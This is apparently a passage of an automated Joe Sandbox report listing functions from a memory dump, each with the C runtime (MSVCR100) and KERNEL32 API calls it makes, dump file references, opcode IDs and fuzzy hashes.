                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 765448609-0
                                                                                                          • Opcode ID: 916d5e87abcd3bf375bfb73fe2c4952087193d89d2cae16ee93865743c674945
                                                                                                          • Instruction ID: 6991dd554cbcf065f89c412fdb2313d75c102a90c8b3618db26ab5b2bfbe56d9
                                                                                                          • Opcode Fuzzy Hash: 916d5e87abcd3bf375bfb73fe2c4952087193d89d2cae16ee93865743c674945
                                                                                                          • Instruction Fuzzy Hash: B3F06272610629AFDF019FB9CD8088ABBE9FB8A275351053BE505E7250EB71FC518BD0
                                                                                                          Function 6FD829D4 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93B8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93C3
                                                                                                          • _errno.MSVCR100(?,?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93CD
                                                                                                          • _errno.MSVCR100 ref: 6FDA93E4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: 7ca44f10612802baf5170cd1029790ff495157fc58dc99bf2fbc56158234fa9f
                                                                                                          • Instruction ID: 345e2067aa7b2e0c1b13bd071a63ff2c5a0c1df71028dc2abc1b90cbbd79f19d
                                                                                                          • Opcode Fuzzy Hash: 7ca44f10612802baf5170cd1029790ff495157fc58dc99bf2fbc56158234fa9f
                                                                                                          • Instruction Fuzzy Hash: 4F018131441B09EBCB912FA4DC05BDA3BB4AF02339F014716F8385A1E0DBB7B56087A6
                                                                                                          Function 6FD92B9B Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,6FD92C08,0000000C), ref: 6FD92BCA
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fread_nolock_s.MSVCR100(?,?,?,?,?,6FD92C08,0000000C), ref: 6FD92BE2
                                                                                                            • Part of subcall function 6FD92ACE: memcpy_s.MSVCR100(?,?,?,?), ref: 6FD92B77
                                                                                                            • Part of subcall function 6FD92726: _unlock_file.MSVCR100(6FD92BF9,6FD92BF9), ref: 6FD92729
                                                                                                          • memset.MSVCR100(?,00000000,000000FF,?,?,6FD92C08,0000000C), ref: 6FDA8D02
                                                                                                          • _errno.MSVCR100(?,?,6FD92C08,0000000C), ref: 6FDA8D0A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD92C08,0000000C), ref: 6FDA8D15
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy_smemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4031208221-0
                                                                                                          • Opcode ID: 3e8712edb22c13d57c2adc2e0acaa047443b026c1bb48185b165e7566bd22bbd
                                                                                                          • Instruction ID: a1403be6ce289b3c9906619bf5d4daa510e662ac951c7e585df06f4bd79f94be
                                                                                                          • Opcode Fuzzy Hash: 3e8712edb22c13d57c2adc2e0acaa047443b026c1bb48185b165e7566bd22bbd
                                                                                                          • Instruction Fuzzy Hash: F0011E7180235AEBCF91AFA4D9048DE3B70AF05759F108216F8352A1A0D731A661DFE1
                                                                                                          Function 6FDDAF74 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDAF8D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDAF98
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDAFB8
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDDAFCA
                                                                                                            • Part of subcall function 6FD96924: memset.MSVCR100(?,000000FF,00000024), ref: 6FD9694D
                                                                                                            • Part of subcall function 6FD96924: _get_daylight.MSVCR100(?), ref: 6FD96989
                                                                                                            • Part of subcall function 6FD96924: _get_dstbias.MSVCR100(?), ref: 6FD9699B
                                                                                                            • Part of subcall function 6FD96924: _get_timezone.MSVCR100(?), ref: 6FD969AD
                                                                                                            • Part of subcall function 6FD96924: _gmtime64_s.MSVCR100(?,?), ref: 6FD969E1
                                                                                                          • _wasctime.MSVCR100(?), ref: 6FDDAFD9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_get_daylight_get_dstbias_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_localtime64_s_wasctimememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3858866722-0
                                                                                                          • Opcode ID: cd7eccd65bc3bd6e2eccd874a123fdd5cbdfca4e8d6b0c328201dd28ef08d68a
                                                                                                          • Instruction ID: 6bd83e246154ead1a69768f6f54dbf4a4c272b75028c5f02f493f07df426d4b5
                                                                                                          • Opcode Fuzzy Hash: cd7eccd65bc3bd6e2eccd874a123fdd5cbdfca4e8d6b0c328201dd28ef08d68a
                                                                                                          • Instruction Fuzzy Hash: 52F04FB1505308DEDB80AFB5C844B8E77F8AF05358F159696F405DB182EB34F5848771
                                                                                                          Function 6FD8C3B5 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _control87.MSVCR100(00000001,?,00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FD8C3E3
                                                                                                          • _control87.MSVCR100(00000000,00000000,00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24B3
                                                                                                          • _errno.MSVCR100(00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24BC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24C6
                                                                                                          • _control87.MSVCR100(00000001,?,00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1498936549-0
                                                                                                          • Opcode ID: 653d937e653dbae3c2be1c4975eef3d19483455eb323603dde9f1e342fa2f7e0
                                                                                                          • Instruction ID: 2db09b50c9902e5d55ea032f5c549668dccb3966d7ae6867fb6d649f832c59b1
                                                                                                          • Opcode Fuzzy Hash: 653d937e653dbae3c2be1c4975eef3d19483455eb323603dde9f1e342fa2f7e0
                                                                                                          • Instruction Fuzzy Hash: 5FF09073648714EBD7A56FB89841F9A33949F15B74F10421EF9659F7C0DB70F84042A4
                                                                                                          Function 6FDD9F4C Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F65
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD9F70
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F90
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDD9FA2
                                                                                                            • Part of subcall function 6FD96924: memset.MSVCR100(?,000000FF,00000024), ref: 6FD9694D
                                                                                                            • Part of subcall function 6FD96924: _get_daylight.MSVCR100(?), ref: 6FD96989
                                                                                                            • Part of subcall function 6FD96924: _get_dstbias.MSVCR100(?), ref: 6FD9699B
                                                                                                            • Part of subcall function 6FD96924: _get_timezone.MSVCR100(?), ref: 6FD969AD
                                                                                                            • Part of subcall function 6FD96924: _gmtime64_s.MSVCR100(?,?), ref: 6FD969E1
                                                                                                          • asctime.MSVCR100(?), ref: 6FDD9FB1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_get_daylight_get_dstbias_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_localtime64_sasctimememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2107176077-0
                                                                                                          • Opcode ID: 36d822ad0f1c43dbcd1ca7990dd919fe1d5c873403e06de1cdcad851be8f3bb4
                                                                                                          • Instruction ID: d5aaa0c213da1463d4443ff7a9ad66bd16c6720b747629e3860e9f01e5b71f24
                                                                                                          • Opcode Fuzzy Hash: 36d822ad0f1c43dbcd1ca7990dd919fe1d5c873403e06de1cdcad851be8f3bb4
                                                                                                          • Instruction Fuzzy Hash: 50F08770904308EEDB80AFB4C814B8E7BF8AF09328F141226F005EB1C4EB31F5808762
                                                                                                          Function 6FDF9F18 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF9F98,0000000C), ref: 6FDF9F35
                                                                                                          • _errno.MSVCR100(6FDF9F98,0000000C), ref: 6FDF9F3C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF9F98,0000000C), ref: 6FDF9F47
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock.MSVCR100(00000003,6FDF9F98,0000000C), ref: 6FDF9F53
                                                                                                          • _putch_nolock.MSVCR100(?,6FDF9F98,0000000C), ref: 6FDF9F6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno_invalid_parameter_invalid_parameter_noinfo_lock_putch_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3663007277-0
                                                                                                          • Opcode ID: 80568384f97f97522d6c2da2a89250f85f2937ed84b4195f6ea2972fc3021e15
                                                                                                          • Instruction ID: a153386a8a5b737cbe4678fbf4799c3e89c329845b06381f2eda4d8c982d6122
                                                                                                          • Opcode Fuzzy Hash: 80568384f97f97522d6c2da2a89250f85f2937ed84b4195f6ea2972fc3021e15
                                                                                                          • Instruction Fuzzy Hash: 63F0AF71D46305DEDB80AFB48C8099D7B706F41378F528769A0358B1D4C738F6838B62
                                                                                                          Function 6FDDAE79 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDAE92
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDAE9D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDAEB5
                                                                                                          • _localtime32_s.MSVCR100(?,?), ref: 6FDDAEC7
                                                                                                            • Part of subcall function 6FDD960C: _errno.MSVCR100(?,?,?,?), ref: 6FDD9628
                                                                                                            • Part of subcall function 6FDD960C: _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6FDD9632
                                                                                                          • _wasctime.MSVCR100(?), ref: 6FDDAED6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_invalid_parameter_localtime32_s_wasctime
                                                                                                          • String ID:
                                                                                                          • API String ID: 1615393626-0
                                                                                                          • Opcode ID: 02aa5a4144948f83b9ddf46d5256a4ab993f6e7ed37be406aab900aed2d0de79
                                                                                                          • Instruction ID: a65b21515330005b3130bc9caa8af06bdacab2b13571663902f45d96396c6a35
                                                                                                          • Opcode Fuzzy Hash: 02aa5a4144948f83b9ddf46d5256a4ab993f6e7ed37be406aab900aed2d0de79
                                                                                                          • Instruction Fuzzy Hash: 4EF049B0605308DEDB80BFA5C844A8A37B8AF09358F018426E401AB181EB35F980C771
                                                                                                          Function 6FD828F9 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • TlsGetValue.KERNEL32(?,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8291A
                                                                                                          • TlsGetValue.KERNEL32(?,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8292C
                                                                                                          • DecodePointer.KERNEL32(00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD82942
                                                                                                          • _freefls.MSVCR100(00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8294D
                                                                                                          • TlsSetValue.KERNEL32(FFFFFFFF,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8295F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$DecodePointer_freefls
                                                                                                          • String ID:
                                                                                                          • API String ID: 3710474716-0
                                                                                                          • Opcode ID: 44ff405db170469dc4242b4bf421804eb0227508edcc4ce6e60c71fee3c36261
                                                                                                          • Instruction ID: 35f2c8e1996aabdff78ee72048fbb1e772b15350215f728621945986c610b2e2
                                                                                                          • Opcode Fuzzy Hash: 44ff405db170469dc4242b4bf421804eb0227508edcc4ce6e60c71fee3c36261
                                                                                                          • Instruction Fuzzy Hash: CBF04930450A94EEEF406B60CD09B593FE5FB0377AF140212F539950A1EB317971DA90
                                                                                                          Function 6FD8A675 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FD8A6B0
                                                                                                          • __doserrno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB040F
                                                                                                          • _errno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB0417
                                                                                                          • _errno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB042A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB0435
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 20a0a429def4bea4cd57dbedadd402ae97b209fb5330f08ddfd54193ef6f9986
                                                                                                          • Instruction ID: c4d990e15419760d8130ef6b8010a1c7ff01f4bd9aec3bcd0e3b050789869dde
                                                                                                          • Opcode Fuzzy Hash: 20a0a429def4bea4cd57dbedadd402ae97b209fb5330f08ddfd54193ef6f9986
                                                                                                          • Instruction Fuzzy Hash: A3F0B471154704DBD3916FB4C6047383BA0AF82379F024286D4398F6D2EFB8F8428661
                                                                                                          Function 6FDBCF41 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6FDBD032
                                                                                                          • memset.MSVCR100(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6FDBD045
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: $$,
                                                                                                          • API String ID: 2221118986-53852779
                                                                                                          • Opcode ID: e2d83b1a819bed4c5a230ef617da4e9fa3b3306b2f05e93d613d94c158604098
                                                                                                          • Instruction ID: bc71897d4c71af237897dc83d16f822af85e9356a672988f837357e334720449
                                                                                                          • Opcode Fuzzy Hash: e2d83b1a819bed4c5a230ef617da4e9fa3b3306b2f05e93d613d94c158604098
                                                                                                          • Instruction Fuzzy Hash: 7F4131F1A05219BFDF91DFA8C880A9DBBB5FF48344F004169E816A7240D771BE41DBA1
                                                                                                          Function 6FD80050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlUnwind.KERNEL32(?,6FD8009E,80000026,00000000,?,?), ref: 6FD80099
                                                                                                          • _local_unwind2.MSVCR100(?,?,?), ref: 6FD800CD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unwind_local_unwind2
                                                                                                          • String ID: &$02CV
                                                                                                          • API String ID: 2435528123-3673091860
                                                                                                          • Opcode ID: 7eaa927affb8f41a119cb8702c5678dcaff223248e58f91951dec147792d1fd1
                                                                                                          • Instruction ID: a857283bb455e5cf556238670369cf62ca3f0b569c6a684381df21573fe578a8
                                                                                                          • Opcode Fuzzy Hash: 7eaa927affb8f41a119cb8702c5678dcaff223248e58f91951dec147792d1fd1
                                                                                                          • Instruction Fuzzy Hash: B4116AB1901218DBEB50CF94C884B9ABBA8FF04354F511654EC64AF289D779FC85CBE2
                                                                                                          Function 6FDD6051 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD606F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD607A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: B
                                                                                                          • API String ID: 340685940-1255198513
                                                                                                          • Opcode ID: 84689359ee98af9bbd24896079f869f8e2a27bd226ec128c23e9bc73a310a237
                                                                                                          • Instruction ID: 6a93aecc3fea39bfb16d552636977f94753e5148dca7b21099fd338b0e158ca1
                                                                                                          • Opcode Fuzzy Hash: 84689359ee98af9bbd24896079f869f8e2a27bd226ec128c23e9bc73a310a237
                                                                                                          • Instruction Fuzzy Hash: F001257190421D9FDB40DFE8CC419EEB7B8EB09364F104166F524E7180D775A9459BB1
                                                                                                          Function 6FDC0393 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
